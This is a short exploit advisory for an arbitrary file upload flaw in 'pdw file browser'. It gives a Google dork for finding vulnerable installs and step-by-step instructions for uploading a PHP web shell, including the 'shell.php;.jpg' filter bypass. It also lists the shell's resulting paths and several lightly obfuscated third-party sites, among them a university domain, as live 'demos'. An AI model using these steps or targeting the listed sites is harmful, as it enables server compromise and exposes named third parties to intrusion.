------------------------------------------------------------------------------- pdw file browser Arbitrary File Upload Vulnerability -------------------------------------------------------------------------------- ##### # Author => Zikou-16 # # Facebook => http://fb.me/Zikou.se # # Google Dork => inurl:"pdw_file_browser" # # Tested on : Windows 7 , Backtrack 5r3 #### Exploit : Go to => http://localhost/pdw_file_browser/ => Upload => Browse... & upload your shell => shell.php or try with shell.php;.jpg your shell : 4 example => Currently uploading in folder: /pdw_file_browser/img/ => http://localhost/pdw_file_browser/img/shell.php => http://localhost/pdw_file_browser/img/shell.php;.jpg ------------------------------ [#] Demos : http://www.peXrkiss.com/pdw_file_browser/ http://blueskyXrokers.org/pdw_file_browser/ http://www.hX.ed.ac.uk/web-team/test/editpage/pdw_file_browser/ ------------------------------ The End